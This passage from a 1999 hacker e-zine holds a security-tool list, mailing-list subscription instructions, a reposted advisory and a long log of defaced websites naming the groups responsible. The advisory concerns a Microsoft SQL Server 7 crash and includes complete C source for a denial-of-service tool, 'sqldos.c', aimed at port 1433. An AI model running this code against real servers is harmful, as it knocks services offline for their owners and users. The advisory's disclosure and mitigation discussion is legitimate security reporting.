to a foreign host's port and allows you to communicates with the host.
Alternatively,Lookout can listen on a port and wait for another host to
connect. Lookout can send variable length strings to test buffers easily.
3. cgicheck99 0.4
by deepquest
URL: http://www.deepquest.pf/
Platforms: BSDI, BeOS, DOS, FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD,
OS/2, OpenBSD, OpenVMS, PalmOS, Solaris, SunOS, UNIX, Windows 2000,
Windows 3.x, Windows 95/98, Windows CE and Windows NT Number of downloads:
1079
This is one of the worlds most cross platform cgi scanners, running on 37
operating systems! Even Palmos soon! Will check for 119 of common cgi and
other remote issues. Plus it will report you the Bugtraq ID of some
vulnerabilities. Get the rebol interpreter at http://www.rebol.com.
4. HookProtect
by ANNA Ltd., pcihprot@anna.zaporizhzhe.ua
URL: http://www.geocities.com/SiliconValley/Hills/8839/index.html
Platforms: Windows 95/98 and Windows NT
Number of downloads: 777
HookProtect version 2.05 is an another powerful product of PCinvestigator
series. It is specialized on detecting the programs that infringe the
privacy and confidentiality on personal computers. There are many various
types of such programs: keyloggers, interceptors, spies, Trojans and so
on. Their main function is monitoring of some kind of user's activity on a
computer (for example, typing the text, running the applications, opening
the windows, Internet activity, etc.).
5. Pandora for Linux v4 beta 2
by Nomad Mobile Research Centre
URL: http://www.nmrc.org/pandora
Platforms: Linux
Number of downloads: 693
BETA - Online point and click auditing of Novell Netware from Windows NT.
Currently spoofing works but lots of crashes on SP3 (we're working on it).
Attach to server with password hashes extracted from Offline program.
Search for target servers. Attach to a server and grab user accounts
without logging in. Dictionary attack against user account. Multiple
Denial of Service attacks. Improved spoofing and hijacking by using
realtime sniffing. Works against Netware 4 and 5.
6. Sun Enterprise Network Security Service Early Access 1
by Sun Microsystems
URL: http://www.sun.com/software/communitysource/senss/
Platforms: Java
Number of downloads: 637
Sun Enterprise Network Security Service (SENSS) is a flexible, Java-based
security solution: a tool that enables organizations to audit and secure
their systems and networks in a modern, heterogeneous, corporate intranet.
The SENSS software is not yet complete; this is the Early Access 1
release, made available for the benefit of parties with a professional
interest in network security, for their experimentation and comment.
The source code is licensed under the Sun Community Source-Code License,
consistent with the Sun Community Source License principles.
IX. SPONSOR INFORMATION -
------------------------------------------
URL: http://www.core-sdi.com
CORE SDI is an international computer security research and development
company. It's clients include 3 of the Big 5 chartered accountant firms
for whom CORE SDI develops customized security auditing tools as well as
several notable computer security product vendors, such as Network
Associates. CORE SDI also has extensive experiance dealing with financial
and government contracts through out Latin and North America.
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
-------------------------------------
1. How do I subscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBSCRIBE SF-NEWS Lastname, Firstname
You will receive a confirmation request message to which you will have
to anwser.
2. How do I unsubscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed
address with a message body of:
UNSUBSCRIBE SF-NEWS
If your email address has changed email aleph1@securityfocus.com and I
will manualy remove you.
3. How do I disable mail delivery temporarily?
If you will are simply going in vacation you can turn off mail delivery
without unsubscribing by sending LISTSERV the command:
SET SF-NEWS NOMAIL
To turn back on e-mail delivery use the command:
SET SF-NEWS MAIL
4. Is the list available in a digest format?
Yes. The digest generated once a day.
5. How do I subscribe to the digest?
To subscribe to the digest join the list normally (see section 0.2.1)
and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message
body of:
SET SF-NEWS DIGEST
6. How do I unsubscribe from the digest?
To turn the digest off send a message to LISTSERV with a message body
of:
SET SF-NEWS NODIGEST
If you want to unsubscribe from the list completely follow the
instructions of section 0.2.2 next.
7. I seem to not be able to unsubscribe. What is going on?
You are probably subscribed from a different address than that from
which you are sending commands to LISTSERV from. Either send email from
the appropiate address or email the moderator to be unsubscribed manually.
Alfred Huger
VP of Engineering
SecurityFocus.com
@HWA
28.0 SQL 7 "Magic Packet" DoS
~~~~~~~~~~~~~~~~~~~~~~~~
From NTSecurity list
Kevork Belian discovered this on Dec. 1. I have been working with his code
trying to replicate the results but have yet to be successful. This does
not
mean that Kevork's findings are incorrect, it just means that I need to do
more testing.
I don't believe in holding information back from the mailing list so here
are the complete details as received from Kevork. Including his code.
This was tested on SQL 7.00.699
MS SQL Server TCP/IP net library must be enabled. Sending more than 3 NULL
bytes in the TCP data can crash the SQL Server. MS SQL listens on TCP port
1433. If this attack is successful you will see an event 17055 in your log
and you will have to reboot to restore service.
It has been suggested that a solution would be to block incoming traffic on
port 1433 or disable the TCP/IP net library. Of course this could have an
impact on the functionality of the product. It would be preferable to have
a MS hotfix for this issue. Microsoft has been notified and are working on
the situation themselves.
It is unknown at this time if this attack is actually being carried out.
============ original text from Kevork Belian========
Description:
MS SQL Server 7.0 silently crashes when sent a TCP packet containing more
than 2 NULLs as data.
I tested this on machines running SQL Server version 7.00.699 (SP 1). The NT
box is running NT Server with SP 4 (I don't think the Service Pack is an
issue since NT is not affected).
If the TCP/IP net library is enabled, the 3 or greater NULL bytes crash SQL
Server listening on port 1433. The SQL server raises an event 17055 with
fatal exception EXCEPTION_ACCESS VIOLATION.
I have noticed that you might experience a situation when the SQL Server
won't crash at first; keep resending the packet until it crashes
(hopefully).
It puzzles me why other people weren't able to reproduce it. Is it a
misconfiguartion issue (I seriosly doubt it).
thanks
Kevork Belian
========end text=========
====begin script from Kevork Belian=====
/*
** sqldos.c -- a DoS attack agains MS SQL Server
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 1433 /* the port SQL Server listens on */
int main(int argc, char *argv[])
{
int sockfd, numbytes;
struct hostent *he;
char buff[65535];
struct sockaddr_in target_addr;
if (argc != 2) {
fprintf(stderr,"Usage: sqldos target\n");
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL)
perror("gethostbyname");
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket error");
exit(1);
}
target_addr.sin_family = AF_INET;
target_addr.sin_port = htons(PORT);
target_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(target_addr.sin_zero), 8);
if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct
sockaddr)) == -1) {
perror("connect error");
exit(1);
}
memset(&buff, 0, 3);
if ((numbytes=send(sockfd, buff, 14, 0)) == -1) {
perror("send errot");
exit(1);
}
c
lose(sockfd);
return 0;
}
=======end script=========
Of course credit has to go to Kevork Belian as he made the discovery. I
would be interested to hear if anyone else can replicate this.
Regards;
Steve Manzuik
Moderator
Win2K Security Advice
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
@HWA
-=----------=- -=----------=- -=----------=- -=----------=-
0
0
0
o
O O O
0
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ _ _
/\ | | | | (_) (_)
/ \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _
/ /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
/ ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| |
/_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, |
__/ |
|___/
ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
When people ask you "Who is Kevin Mitnick?" do you have an answer?
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
http://www.2600.com/ http://www.kevinmitnick.com
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* http://www.csoft.net" One of our sponsers, visit them now www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
// or cruciphux@dok.org //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! ............c'mon, you KNOW you
wanna...yeah you do...make it fresh and new...be famous...<sic>
SITE.1
You can Send in submissions for this section too if you've found
(or RUN) a cool site...
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
___| _ \ |
| __| _` |\ \ / | | __| _ \ _` |
| | ( | ` < | | | __/ ( |
\____|_| \__,_| _/\_\\___/ _| \___|\__,_|
Note: The hacked site reports stay, especially wsith some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name, others aren't so obvious but do exist.
>Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
* Info supplied by the attrition.org mailing list.
Listed oldest to most recent...
Defaced domain: sony.com.pa
Site Title: Sony (Panama)
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.dellnet.com.br
Site Title: DellNet
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.dellnet.com.br
Defaced by: The Death Knights
Operating System: Linux
Defaced domain: www.gateway.com.my
Site Title: Gateway Malaysia
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.gateway.com.my
Defaced by: ieet
Operating System: Windows NT
Defaced domain: www.honda.com.kw
Site Title: Honda Korea
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.honda.com.kw
Defaced by: ytcracker
Operating System: Linux
Defaced domain: www.pcmac.com
Site Title: PC Mac Consultants
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.pcmac.com
Defaced by: cipher
Operating System: Windows NT
Defaced domain: homesandloansinc.com
Site Title: Homes And Loans Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/homesandloansinc.com
Defaced by: Tranzer
Operating System: Windows NT
Defaced domain: www.boobshack.com
Site Title: Boob Shack
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.boobshack.com
Defaced by: naptime
Operating System: Linux
Previously Hacked
Defaced domain: www.whitehousehistory.org
Site Title: The White House Historical Association
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whitehousehistory.org
Defaced by: Einstein
Operating System: Windows NT
Attrition comment: 2nd time hacked
Defaced domain: www.faculdadesantamarta.br
Site Title: Faculdade Santa Marta
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.faculdadesantamarta.br
Defaced by: The Death Knights
Operating System: Linux
Previously Hacked
Defaced domain: sony.com.pa
Site Title: Sony Panama
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa
Defaced by: Antichrist
Operating System: Windows NT
Attrition comment: 2nd time defaced
Defaced domain: www.ai-security.com
Site Title: AI Security Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.ai-security.com
Defaced by: g e n X h a k
Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6)
Previously Hacked
Defaced domain: www.monicalewinsky.com
Site Title: Monica Lewinsky's Web site
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.monicalewinsky.com
Defaced by: un1x bowling t34m
Operating System: BSDI
Attrition comment: 4th time defaced
Defaced domain: www.nissan.com.mx
Site Title: Nissan Mexico
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.nissan.com.mx
Defaced by: ytcracker
Operating System: Windows NT
Previously Hacked
Defaced domain: acquisition.jpl.nasa.gov
Site Title: Jet Propulsion Labs NASA
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/acquisition.jpl.nasa.gov
Defaced by: JLM
Operating System: Windows NT (IIS/4.0)
Attrition comment: Previously defaced on 99.10.26 by phreak.nl
Defaced domain: www.whataburger.com
Site Title: Whataburger Restaurants
Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whataburger.com
Defaced by: klept0
Operating System: Linux
Defaced domain: www.asesor.com.pe
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.asesor.com.pe
Defaced by: xhostile/acidklown
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.spyconnection.com
Site Title: Spy Connection
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.spyconnection.com
Defaced by: `defcon
Operating System: BSDI
Defaced domain: www.wireless.ee
Site Title: Phreak.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.wireless.ee
Defaced by: Phreak.nl
Operating System: Windows 95
Defaced domain: www.oab.org.br
Site Title: Ordem dos Advogados do Brasil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.oab.org.br
Defaced by: inferno.br
Operating System: Windows NT
Defaced domain: www.fabrisia.com
Site Title: Fabrisia Cronin
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.fabrisia.com
Defaced by: Analognet
Operating System: Linux
Defaced domain: www.rayee.com
Site Title: Rayee
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.rayee.com
Defaced by: Analognet
Operating System: BSDI
Defaced domain: www.streamingcam.com
Site Title: Straming Cam
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.streamingcam.com
Defaced by: Analognet
Operating System: BSDI
Defaced domain: www.compunetcgi.com
Site Title: Compunet Computer Group
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.compunetcgi.com
Defaced by: Evil Entity
Operating System: Windows NT (IIS/4.0)
Defaced domain: whv1.warnervideo.com
Site Title: Warner Home Video
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/whv1.warnervideo.com
Defaced by: etC
Operating System: Solaris 2.5.x (Netscape-Enterprise/2.0a)
Defaced domain: www.dds.be
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.dds.be
Defaced by: sacudo69
Operating System: Irix (Rapidsite/Apa-1.3.4)
Previously Hacked
Defaced domain: www.hg.com.cn
Site Title: HG China
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.hg.com.cn
Defaced by: kryptek
Operating System: Solaris
Attrition comment: 2nd time defaced
HIDDEN comments in the HTML.
Previously Hacked
Defaced domain: www.nukleer.gov.tr
Site Title: Cekmece Nuclear Research and Training Center
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.nukleer.gov.tr
Defaced by: oystr-n-klam
Operating System: Linux
Attrition comment: 2nd time defaced
Defaced domain: www.latino-market.com
Site Title: Millennium Computers
Mirror: http://www.attrition.org/mirror/attrition/1999/11/29/www.latino-market.com
Defaced by: p4riah
Operating System: WIndows NT
Defaced domain: bodystore.nu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/bodystore.nu
Defaced by: I.R.C.
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.investigationresources.com
Site Title: Investigative Resources Agency
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.investigationresources.com
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Attrition comment: mass hack
Previously Hacked
Defaced domain: www.esdcinc.com
Site Title: ESDC Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.esdcinc.com
Defaced by: Floghe
Operating System: Windows NT
Defaced domain: www.thomashosp.com
Site Title: Thomas Hosp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.thomashosp.com
Defaced by: w0lf
Operating System: Irix
Defaced domain: www.lottoteam.de
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.lottoteam.de
Defaced by: r00tabega
Operating System: Irix (Rapidsite/Apa-1.3.4)
Defaced domain: www.familyheartbeat.org
Site Title: electr0n
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.familyheartbeat.org
Defaced by: electr0n
Operating System: BSDI
Defaced domain: www.phifersystems.com
Site Title: Phifer Systems, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.phifersystems.com
Defaced by: ytcracker
Operating System: Linux
Defaced domain: www.barat.edu
Site Title: Barat College
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/www.barat.edu
Defaced by: phiber
Operating System: Windows NT
Defaced domain: west.medicdata.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/30/west.medicdata.com
Defaced by: ytcracker
Operating System: Red Hat Linux (Apache 1.3.6)
Defaced domain: www.car-4sale.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.car-4sale.com
Defaced by: ytcracker
Operating System: BSDI 3.0 (Apache 1.2.6)
Defaced domain: tfcnews.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/tfcnews.com
Defaced by: Hate Inc
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.ahcg.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.ahcg.com
Defaced by: xhostile & acidklown
Operating System: MacOS (AppleShareIP/6.0.0)
Defaced domain: www.globefilm.com.au
Site Title: Globe Film
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.globefilm.com.au
Defaced by: xhostile & acidk|own
Operating System: Windows NT
Defaced domain: www.calcapital.com
Site Title: Cal Capital
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.calcapital.com
Defaced by: hV2k
Operating System: BSDI
Defaced domain: stace.commed.ru
Site Title: Commed Web Hosting
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/stace.commed.ru
Defaced by: ytcracker
Operating System: Linux
Defaced domain: www.toystory2.net
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.toystory2.net
Defaced by: zeroc
Operating System: BSDI (Apache 1.3.6)
Defaced domain: www.uni-net.co.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/12/01/www.uni-net.co.uk
Defaced by: RETURN OF APOCALYPSE
Operating System: Solaris 2.6 - 2.7 (Apache 1.2.4)
HIDDEN comments in the HTML.
Previously Hacked
Defaced domain: www.lottoteam.de
Site Title: Lotto Team
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.lottoteam.de
Defaced by: Fuby
Operating System: Irox
Attrition comment: 2nd time defaced
HIDDEN comments in the HTML.
Defaced domain: www.m-hip.com
Site Title: McDermit Combined Schools
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.m-hip.com
Defaced by: Fuby
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.pornography.com
Site Title: Atlantis Management Group
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.pornography.com
Defaced by: Sploit
Operating System: Windows NT (IIS/4.0)
Previously Hacked
Defaced domain: tfcnews.com
Site Title: TFC News
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/tfcnews.com
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Attrition comment: Yes, it really was hacked.
Defaced domain: unix.webgraphics.com
Site Title: Worldwide Web Graphics
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/unix.webgraphics.com
Defaced by: Nitr0BurN
Operating System: Linux (Apache 1.3.4)
Defaced domain: www.ivcsnet.net
Site Title: Imperial Valley Computer Service
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/www.ivcsnet.net
Defaced by: p4riah
Operating System: Windows NT (IIS/4.0)
Defaced domain: mars.assiniboinec.mb.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/mars.assiniboinec.mb.ca
Defaced by: nitroburn
Operating System: Linux (Apache 1.2.6)
Defaced domain: radius.preferred.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/02/radius.preferred.com
Defaced by: nitroburn
Operating System: Linux (Apache 1.3.3)
Defaced domain: www.socioambiental.org
Site Title: Instituto Socioambiental
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.socioambiental.org
Defaced by: c3zar
Operating System: Irix (Rapidsite/Apa-1.3.4)
Defaced domain: www.optimumsettings.com
Site Title: CEO Software, Inc
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.optimumsettings.com
Defaced by: wkD
Operating System: Linux (Apache/1.3.4)
Defaced domain: coldwellbankerj-s.com
Site Title: Coldwell Banker Justrom & Stromme
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/coldwellbankerj-s.com
Defaced by: DHC
Operating System: Linux (Apache 1.2.4)
Defaced domain: www.themillcasino.com
Site Title: The Mill Casino
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.themillcasino.com
Defaced by: DHC
Operating System: Linux (Apache 1.2.4)
Defaced domain: www.pioneerimplement.com
Site Title: Pioneer Implement
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.pioneerimplement.com
Defaced by: DHC
Operating System: Linux (Apache 1.2.4)
Defaced domain: www.schedulerplus.com
Site Title: CEO Software
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.schedulerplus.com
Defaced by: wkD
Operating System: Linux (Apache 1.3.4)
Defaced domain: www.votedbest.com
Site Title: Irmo News
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.votedbest.com
Defaced by: Uneek
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.indev.nic.in
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.indev.nic.in
Defaced by: c0rvus
Operating System: Windows NT (IIS/4.0)
Defaced domain: beta.intuit.com
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/beta.intuit.com
Defaced by: Uneek Technologies
Operating System: Windows NT (WebSitePro/1.1h)
Defaced domain: www.css.com
Site Title: Consult Supply Support
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.css.com
Operating System: FreeBSD 2.2.1 - 3.0
Attrition comment: Defacement implies site was RM'd
Defaced domain: www.bhv.hn
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.bhv.hn
Defaced by: xhostile & acidklown
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.swoya.com
Site Title: Boys & Girls Club of Southwestern Oregon
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.swoya.com
Defaced by: DHC
Operating System: Linux
Defaced domain: www.mtb.gov.br
Site Title: Ministerio do Trabalho e do Emprego
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.mtb.gov.br
Defaced by: inferno.br
Operating System: Windows NT
Defaced domain: www.kdcq.com
Site Title: K-Dock Oldies 93.5
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.kdcq.com
Defaced by: DHC
Operating System: Linux
Defaced domain: www.trt6.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.trt6.gov.br
Defaced by: Einstein
Operating System: WinNT
Defaced domain: www.memphischamber.com
Site Title: Towery Publishing
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.memphischamber.com
Defaced by: bansh33 and Analognet
Operating System: Irix
Previously Hacked
Defaced domain: www.salton-maxim.com
Site Title: Samantha Dreimann
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.salton-maxim.com
Defaced by: p4riah
Operating System: WinNT
Previously Hacked
Defaced domain: www.hwa.net
Site Title: Hoefer WYSOCKI Architects
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.hwa.net
Defaced by: n4rfy
Operating System: WinNT
Defaced domain: www.cuztom.com
Site Title: Cuztom Incorporated
Mirror: http://www.attrition.org/mirror/attrition/1999/12/03/www.cuztom.com
Defaced by: cipher
Operating System: WinNT
Defaced domain: www.ordsvy.gov.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ordsvy.gov.uk
Defaced by: Sarin
Operating System: Windows NT (IIS/4.0)
HIDDEN comments in the HTML
Defaced domain: www.nctsjax.navy.mil
Site Title: Navy Computer and Telecommunications Station, Jacksonvile FLorida
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.nctsjax.navy.mil
Defaced by: s01o and k-0s
Operating System: Windows NT
Defaced domain: aoc.gov
Site Title: The Architect of the United States Capitol
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/aoc.gov
Defaced by: Verb0
Operating System: Windows NT
Defaced domain: cpma.apg.army.mil
Site Title: Civilian Personnel Operations Center Management Agency
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/cpma.apg.army.mil
Defaced by: s01o and k-0s
Operating System: Windows NT
Previously Hacked
Defaced domain: www.learncomm.org
Site Title: Kiel Woodward Associates
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.learncomm.org
Defaced by: DHC
Operating System: Irix
Defaced domain: www.zetcom.ru
Site Title: Zetcom
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.zetcom.ru
Defaced by: Z0omer
Operating System: Windows NT
Previously Hacked
Defaced domain: www.pietersburg.org.za
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.pietersburg.org.za
Defaced by: aKt0r & DajinX
Operating System: Windows NT (IIS/4.0)
Attrition comment: Previously defaced on 99.09.18 by 139_r00ted - one of 11 .za domains hacked
Previously Hacked
Defaced domain: www.asesor.com.pe
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.asesor.com.pe
Defaced by: bean0
Operating System: Windows NT (IIS/4.0)
Attrition comment: Previously defaced on 99.11.29 by acidkl0wn
Defaced domain: www.colts.com
Site Title: National Football League
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.colts.com
Defaced by: Tr1pl3 S31S
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.isaltda.com.uy
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.isaltda.com.uy
Defaced by: m0zy
Operating System: Windows NT (Lotus-Domino/Versi¢n-4.6.3a)
Defaced domain: www.ta-eng.com
Site Title: TA Engineering
Mirror: http://www.attrition.org/mirror/attrition/1999/12/04/www.ta-eng.com
Defaced by: himi
Operating System: Windows NT (IIS/4.0)
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://datatwirl.intranova.net ** NEW **
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/zine/hwa/ *UPDATED*
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
